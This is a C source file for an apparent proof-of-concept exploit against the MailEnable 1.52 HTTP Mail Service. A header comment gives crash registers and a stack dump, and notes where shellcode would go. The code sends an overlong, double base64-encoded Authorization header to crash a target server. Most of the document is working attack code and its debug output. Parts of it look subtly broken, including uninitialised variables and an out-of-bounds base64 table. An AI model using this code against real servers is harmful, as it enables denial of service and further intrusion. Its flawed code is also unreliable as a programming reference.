/* *MailEnable 1.52 HTTP Mail Service Stack Overflow POC Exploit(encoded comand) *Debugging Info *szAppName : MEHTTPS.EXE szAppVer : szModName : MEHTTPS.EXE *szModVer : offset : 00010c21 *Files that caused error : *C:\DOCUME~1\Stefan\LOCALS~1\Temp\WER567c.dir00\MEHTTPS.EXE.mdmp *C:\DOCUME~1\Stefan\LOCALS~1\Temp\WER567c.dir00\appcompat.txt * *The problem appears when a specialy encoded 64base string is sent to the HTTP Mail Server *ASM instructions *00410C21 8917 MOV DWORD PTR DS:[EDI],EDX *00410C23 83C7 04 ADD EDI,4 *00410C26 BA FFFEFE7E MOV EDX,7EFEFEFF *00410C2B 8B01 MOV EAX,DWORD PTR DS:[ECX] *00410C2D 03D0 ADD EDX,EAX *00410C2F 83F0 FF XOR EAX,FFFFFFFF *00410C32 33C2 XOR EAX,EDX *00410C34 8B11 MOV EDX,DWORD PTR DS:[ECX] *00410C36 83C1 04 ADD ECX,4 *EDX=48545541 *DS:[54516FF1]=??? * *CPU registers *EAX 70F8FEFE *ECX 004212B8 mehttps.004212B8 *EDX 48545541 *EBX 003B2660 *ESP 00BB2900 *EBP 00BB2E20 ASCII "UATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUAT *ESI 003B2660 *EDI 54516FF1 *EIP 00410C21 mehttps.00410C21 *Stack *00BB2D1C 69736142 *00BB2D20 45542063 *00BB2D24 55504551 *00BB2D28 54515441 *00BB2D2C 44555045 *00BB2D30 45544155 *00BB2D34 55504551 *00BB2D38 54515441 *00BB2D3C 44555045 *00BB2D40 45544155 *00BB2D44 55504551 *00BB2D48 54515441 *00BB2D4C 44555045 *00BB2D50 45544155 *00BB2D54 55504551 *00BB2D58 54515441 *00BB2D5C 44555045 *00BB2D60 45544155 *00BB2D64 55504551 *00BB2D68 54515441 *00BB2D6C 44555045 *00BB2D70 45544155 *00BB2D74 55504551 *00BB2D78 54515441 *00BB2D7C 44555045 *00BB2D80 45544155 *00BB2D84 55504551 *00BB2D88 54515441 *00BB2D8C 44555045 *00BB2D90 45544155 *00BB2D94 55504551 *00BB2D98 54515441 *00BB2D9C 44555045 *00BB2DA0 45544155 *00BB2DA4 55504551 *00BB2DA8 54515441 *00BB2DAC 44555045 *00BB2DB0 45544155 *00BB2DB4 55504551 *00BB2DB8 54515441 *00BB2DBC 44555045 *00BB2DC0 45544155 *00BB2DC4 55504551 *00BB2DC8 54515441 *00BB2DCC 44555045 *00BB2DD0 45544155 *00BB2DD4 55504551 *00BB2DD8 54515441 *00BB2DDC 44555045 *00BB2DE0 45544155 *00BB2DE4 55504551 *00BB2DE8 54515441 *00BB2DEC 44555045 *00BB2DF0 45544155 *00BB2DF4 55504551 *00BB2DF8 54515441 *00BB2DFC 44555045 *00BB2E00 45544155 *00BB2E04 55504551 *00BB2E08 54515441 *00BB2E0C 44555045 *00BB2E10 45544155 *00BB2E14 55504551 *00BB2E18 54515441 *00BB2E1C 44555045 *00BB2E20 45544155 *00BB2E24 55504551 *00BB2E28 54515441 *00BB2E2C 44555045 *00BB2E30 45544155 *00BB2E34 55504551 *00BB2E38 54515441 *00BB2E3C 44555045 *00BB2E40 45544155 *00BB2E44 55504551 *00BB2E48 54515441 *00BB2E4C 44555045 *00BB2E50 45544155 *00BB2E54 55504551 *00BB2E58 54515441 *00BB2E5C 44555045 *00BB2E60 45544155 *00BB2E64 55504551 *00BB2E68 54515441 *00BB2E6C 44555045 *00BB2E70 45544155 *00BB2E74 55504551 *00BB2E78 54515441 *00BB2E7C 44555045 *00BB2E80 45544155 *00BB2E84 55504551 *00BB2E88 54515441 *00BB2E8C 44555045 *00BB2E90 45544155 *00BB2E94 55504551 * *This is the user controled area ,this is where we have to put the shellcode. *Access violation when writing to 0x54516FF1 ->EDI holds this address. *WARNING it is compiled with cygwin console ,if you run it somewere else *be sure to get the cygwin1.dll in the same folder as the executable. *It will surely work with DEV-cpp * *DEMO * *C:\Documents and Settings\Stefan\Desktop\Mail Enable-http crash>nn.exe ******************************************************************************* MailEnable 1.52 HTTP Mail Service Stack Overflow POC Exploit(encoded comand) Credits:fl0 fl0w
-h host HTTP server -p port HTTP server
******************************************************************************* ------------------------------------------ You can use the following IP addresses
Host name is . Address 0: ------------------------------------------
Host name is . Address 1: ------------------------------------------
Host name is . Address 2: ------------------------------------------
Host name is . Address 3: ------------------------------------------
Usage: nn option host option port C:\Documents and Settings\Stefan\Desktop\Mail Enable-http crash>nn.exe -h -p 8080 this program is in the directory /cygdrive/c/Documents and Settings/Stefan/Deskt op/Mail Enable-http crash/ - target : 8080 - Done */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdint.h> #ifdef WIN32 #include <winsock.h> #define close closesocket #define sleep Sleep #else #include <unistd.h> #include <sys/socket.h> #include <sys/types.h> #include <arpa/inet.h> #include <netinet/in.h> #include <netdb.h> #endif #define BUFFSZ 0x2000 #define BOF1SZ 0x12C #define BOF2SZ 0x1388 #define DEFAULT_PORT 8080 #define DEFAULT_HOST "" /* *Function Protptypes * * */ void Menuu(int argc, char **argv) { fprintf(stderr, "\n" "\t-h host HTTP server\n" "\t-p port HTTP server\n" "\n" , argv[0], DEFAULT_PORT, DEFAULT_HOST); }
int doit(int, char **); uint32_t fletcher32(uint8_t data[BUFFSZ], int16_t len); uint8_t *base64_encode(uint8_t *data, int *size); int putcc(uint8_t *data, int chr, int len); int timeout(int sock, int secs); uint32_t resolv(char *host); /* *End Prototypes */ /* * This function gets the PATH of your executable * START PATH */ size_t get_executable_path (char* buffer, size_t len) { char* path_end; if (readlink ("/proc/self/exe", buffer, len) <= 0) return -1; path_end = strrchr (buffer, '/'); if (path_end == NULL) return -1; ++path_end; *path_end = '\0'; return (size_t) (path_end - buffer); } /* *END PATH */ void args(int argc, char *argv[]) { int ip; short port; int a; if(a) while((a = getopt(argc, argv, "h:p")) != EOF) { switch(a) { case 'h': ip = (int)optarg; break; case 'p': port = (int)optarg; break; default: exit(-1); } } } int main(int argc, char *argv[]) { char path[1000]; struct sockaddr_in peer; int sd, len, attack; uint16_t port; uint8_t buff[BUFFSZ], *b64; int a; printf("*******************************************************************************\n"); printf("MailEnable 1.52 HTTP Mail Service Stack Overflow POC Exploit(encoded comand)\n"); printf("\tCredits:fl0 fl0w\n"); Menuu(argc, argv); printf("*******************************************************************************\n"); a = doit(argc, argv); #ifdef WIN32 WSADATA wsadata; WSAStartup(MAKEWORD(1,0), &wsadata); #endif setbuf(stdout, NULL); fputs("\n" "\n", stdout); if(argc < 3) { printf("\n" "Usage: %s option host option port\n" "\n", argv[0]); exit(1); } args(argc, argv); if(argc > 3) port = atoi(argv[4]); get_executable_path (path, sizeof (path)); printf ("this program is in the directory %s\n", path); peer.sin_addr.s_addr = resolv(argv[2]); peer.sin_port = htons(port); peer.sin_family = AF_INET; printf("- target %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port)); sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(sd < 0) exit(0); if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))< 0) exit(0); len = BOF1SZ; putcc(buff, 'A', len); b64 = base64_encode(buff, &len); b64 = base64_encode(b64, &len); len = sprintf(buff,"GET / HTTP/1.0\r\n""Authorization: Basic %s\r\n""\r\n", b64); fletcher32(buff,len); send(sd, buff, len, 0); if(!timeout(sd, 5)) recv(sd, buff, BUFFSZ, 0); close(sd); printf("- done\n"); return(0); } /*As you can see the string is real odd looking that is because EBP points to *a function that filters UPercase caracters :) , so you can see in the stack and at *the Registers section. *That may be the fuction that causes the buffer overdflow. *Function mehttps() it is at(offset) ESP + 4 bytes,in other words get the address of *ESP and add 4 bytes that is it's possition in the stack. *The call stack is *00BB2904 0040BC9A RETURN to mehttps.0040BC9A from mehttps.00410B90 /* * ENCODE STRINGS */ /* *The algorithm for encoding in 64base was *inspired from a code of Aluigi Arena so thnx man ! */ uint8_t *base64_encode(uint8_t *data, int *size) { int len, a, b, c; uint8_t *buff, *p; uint8_t base[64]; base[1] = 0x41; base[7] = 0x47; base[13] = 0x4D; base[19] = 0x53; base[25] = 0x59; base[2] = 0x42; base[8] = 0x48; base[14] = 0x4E; base[20] = 0x54; base[26] = 0x5A; base[3] = 0x43; base[9] = 0x49; base[15] = 0x4F; base[21] = 0x55; base[4] = 0x44; base[10] = 0x4A; base[16] = 0x50; base[22] = 0x56; base[5] = 0x45; base[11] = 0x4B; base[17] = 0x51; base[23] = 0x57; base[6] = 0x46; base[12] = 0x4C; base[18] = 0x52; base[24] = 0x58; //A->Z base[27] = 0x61; base[28] = 0x62; base[29] = 0x63; base[30] = 0x64; base[31] = 0x65; base[32] = 0x66; base[33] = 0x67; base[34] = 0x68; base[35] = 0x69; base[36] = 0x6A; base[37] = 0x6B; base[38] = 0x6C; base[39] = 0x6D; base[40] = 0x6F; base[41] = 0x70; base[42] = 0x71; base[43] = 0x72; base[44] = 0x73; base[45] = 0x74; base[46] = 0x75; base[47] = 0x76; base[48] = 0x77; base[49] = 0x78; base[50] = 0x79; base[51] = 0x7A; base[52] = 0x30; base[53] = 0x31; base[54] = 0x32; base[55] = 0x33; base[56] = 0x34; //a->z base[57] = 0x35; base[58] = 0x36; base[59] = 0x37; base[60] = 0x38; base[61] = 0x39; base[62] = 0x2B; base[63] = 0x2C; base[64] = 0x2F; if(!size || (*size < 0)) { len = strlen(data); } else { len = *size; } buff = malloc(((len / 3) << 2) + 6); if(!buff) return(NULL); p = buff; do { a = data[0]; b = data[1]; c = data[2]; *p++ = base[(a >> 2) & 63]; *p++ = base[(((a & 3) << 4) | ((b >> 4) & 15)) & 63]; *p++ = base[(((b & 15) << 2) | ((c >> 6) & 3)) & 63]; *p++ = base[c & 63]; data += 3; len -= 3; } while(len > 0); *p = 0; for(; len < 0; len++) *(p + len) = '='; if(size) *size = p - buff; return(buff); } /* * * *EDX is controled *EBP holds the long string that is encoded in base64. *Stack starts at address 0x00BB2900 ,at that address there is a DWORD NULLBYTE. *The stack overflow starts at the address 0x00BB2D1C */ int putcc(uint8_t *data, int chr, int len) { memset(data, chr, len); return(len); } int timeout(int sock, int secs) { struct timeval tout; fd_set fd_read; tout.tv_sec = secs; tout.tv_usec = 0; FD_ZERO(&fd_read); FD_SET(sock, &fd_read); if(select(sock + 1, &fd_read, NULL, NULL, &tout) <= 0) return(-1); return(0); } uint32_t resolv(char *host) { struct hostent *hp; uint32_t host_ip; host_ip = inet_addr(host); if(host_ip == INADDR_NONE) { hp = gethostbyname(host); if(!hp) { printf("\nError: Unable to resolv hostname (%s)\n", host); exit(1); } else host_ip = *(uint32_t *)hp->h_addr; } return(host_ip); } uint32_t fletcher32(uint8_t data[BUFFSZ], int16_t len) { uint32_t sum1 = 0xffff, sum2 = 0xffff; while (len) { unsigned tlen = len > 360 ? 360 : len; len -= tlen; do { sum1 += *data++; sum2 += sum1; } while (--tlen); sum1 = (sum1 & 0xffff) + (sum1 >> 16); sum2 = (sum2 & 0xffff) + (sum2 >> 16); } sum1 = (sum1 & 0xffff) + (sum1 >> 16); sum2 = (sum2 & 0xffff) + (sum2 >> 16); return sum2 << 16 | sum1; } int doit(int a, char **b) { char ac[80]; int i; #ifdef WIN32 if (gethostname(ac, sizeof(ac)) == SOCKET_ERROR) { printf("Error " ,WSAGetLastError()); return 1; } #endif struct hostent *phe = gethostbyname(ac); if (phe == 0) { printf("Bad host lookup.\n"); return 1; } printf("------------------------------------------\n"); printf("You can use the following IP addresses\n"); for (i = 0; phe->h_addr_list[i] != 0; ++i) { struct in_addr addr; memcpy(&addr, phe->h_addr_list[i], sizeof(struct in_addr)); printf("\n"); printf("Host name is %s.\n" ,ac); printf("Address %d:%s\n" ,i ,inet_ntoa(addr)); printf("------------------------------------------\n"); } return 0; }